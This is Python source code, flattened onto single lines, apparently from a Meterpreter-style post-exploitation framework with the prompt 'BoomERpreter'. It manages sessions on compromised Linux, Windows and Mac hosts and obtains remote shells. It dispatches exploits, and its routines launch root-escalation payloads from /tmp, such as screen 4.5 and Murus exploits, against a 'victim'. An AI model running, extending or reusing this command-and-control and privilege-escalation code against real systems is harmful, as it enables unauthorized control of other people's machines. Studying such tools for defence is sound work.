def help(self, arg=""): if arg != "": aux = "Help to " + arg name = "help" + sep + "%s" + sep + arg + ".txt" try: file_open = name % ("tool") f = open(file_open, 'r') except: try: file_open = name % ("modules") f = open(file_open, 'r') if not self.myModule: custom_print.info( "To see this help, first load a module") return except: custom_print.info(aux + " doesn't exist...") return print("\n" + aux) print("-" * len(aux) + "\n") print(f.read() + "\n") f.close() else: print("\n--- Operations allowed ---\n") print("______ GLOBAL _______") for key, value in self._options_start.items(): if type(value) == type([]): value = value[0] print(key + ":\n " + value) print("") if (self.myModule is not None): self.myModule.help()
def _delete_session(self, id): try: del self.sessions[id] self.current_session.close() custom_print.info("Session %s has been closed" % str(id)) except: custom_print.error("Error deleting session " + str(id))
def shell(self, data): self.send_msg(data, False) data = self.current_session.recv(4096) result = data.decode() if "No" == result: custom_print.info("No shell obtained") return self.get_shell(result)
def exploit(self, data): try: exp = EXPLOITS[data[1]] except: custom_print.info("No exploit...") return function = exp["function"] getattr(self, function)([function])
def interact(self, session_id): try: session_id = int(session_id) client = self.sessions[session_id][0] self.current_session = client pl = (self.sessions[session_id][1]).lower() if "linux" in pl: self.module_session = Linux(self, self.current_session) custom_print.info("Interacting with: " + pl) elif "windows" in pl: self.module_session = Windows(self, self.current_session) custom_print.info("Interacting with: " + pl) else: self.module_session = Mac(self, self.current_session) custom_print.info("Interacting with: " + pl) except Exception as e: print(e) print("Session no found") return self.completer.set_backup() self.completer.set_all_commands(list(self.module_session.get_functions().keys()),[]) while True: try: data_input = input(color.YELLOW + "BoomERpreter >> " + color.RESET) data_input = data_input.strip() if data_input == "": continue if "exit" in data_input: self.completer.restore_backup() self._delete_session(session_id) return if "background" in data_input: custom_print.info("Session %s to background"%str(session_id)) self.completer.restore_backup() return 1 split_data = data_input.split() opt = self.module_session.get_functions()[split_data[0]] if not opt: continue if not opt["exec"]: getattr(self.module_session, opt["function"])() continue getattr(self.module_session, opt["function"])(split_data) except KeyboardInterrupt: self.completer.restore_backup() self._delete_session(session_id) return 0 except Exception as e: custom_print.error(str(e)) if "Broken pipe" in str(e): custom_print.info("Meterpreter closed") self._delete_session(session_id) return 0
def root_screen45(self, data): self.send_msg(data, False) result = self.recv_msg() if result == "ok": res = input("The exploit is ready. Launch it?(y/n): ") if res.lower() == "y": self.obj_session.send_msg(self.current_session, ["shell", "/tmp/shell"]) data = self.current_session.recv(4096) data = data.decode() self.get_shell(data) else: custom_print.info("Aborted")
def search(self, word): self.search_key = ' '.join(word).lower() custom_print.info("Searching: " + self.search_key) my_list = [] for path, dirs, files in walk('modules'): for f in files: if not "__" in path + '/' + f: my_list.append(path + '/' + f) pool = Pool(2) results = pool.map(self.isIn, my_list) pool.close() pool.join() for result in results: if result: print(result.replace(".py", "").replace("modules/", ""))
def murus_root(self, data): custom_print.info("Waiting.... The victim must start the app") self.send_msg(data, False) result = self.recv_msg() if result == "ok": res = input("The exploit is ready. Launch it?(y/n): ") if res.lower() == "y": self.obj_session.send_msg(self.current_session, ["shell", "/tmp/murus411_exp"]) data = self.current_session.recv(4096) data = data.decode() self.get_shell(data) else: custom_print.info("Aborted") else: print(result)
def check_vuln(self, data): try: check = DATA_CHECK[data[1]] except: custom_print.info("This app can not be verified") return to_check = check["command"] self.send_msg(["check_vuln", to_check], True) result = self.recv_msg() success = False for values in check["versions"]: data = list(values.items()) if data[0][0] in result: custom_print.ok("Vulnerable! " + data[0][1]) success = True if not success: custom_print.error("No vulnerable")
def put(self, key, value): try: self.options[key][1] = value custom_print.info(key + " => " + value) except: custom_print.error("Wrong option: " + key)